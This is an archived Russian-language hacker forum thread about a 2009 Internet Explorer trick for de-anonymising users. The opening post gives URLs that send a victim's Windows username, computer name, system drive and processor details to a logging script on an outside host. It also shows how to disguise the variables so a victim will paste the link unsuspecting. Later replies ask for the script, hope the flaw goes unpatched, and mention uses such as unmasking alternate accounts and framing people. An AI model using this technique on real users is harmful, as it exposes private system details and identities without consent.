PDA

Просмотр полной версии : *де-анонимизация* пользователей IE8


Что? Где? Когда?
09.09.2009, 22:07
Работает только в IE:
http://site.com/siniffer.cgi/[переменная]
Пример: http://ha.ckers.org/log.cgi/%USERNAME%
Можно замаскировать: http://ha.ckers.org/log.cgi/rAnd0mcr4p%uSernAmE%2hide%coMpuTeRnaME%th3v4rz

Некоторые переменные:
%USERNAME% - имя пользователя
%computername% - имя компьютера
%SystemDrive% - системный диск
%PROCESSOR_IDENTIFIER% - описание процессора [Family, Model, Stepping, ModelName]

Важное условие, юзер должен сам скопировать и вставить этот url.
Источник: http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/

BrainDeaD
09.09.2009, 22:22
большой пользы в этом невижу, но интересно. хотелось бы увидеть сам скрипт.

Nightmarе
10.09.2009, 05:22
То есть другими словами IE 8 САМ отсылает всю инфу в заголовках? Ну отлично конешн.

Nightmarе
10.09.2009, 15:22
Надеюсь, что не пофиксят. Фишка действительно классная, как с установкой данных нужных людей, и распознаванием виртуалов, так и с точки зрения "подставы" ;)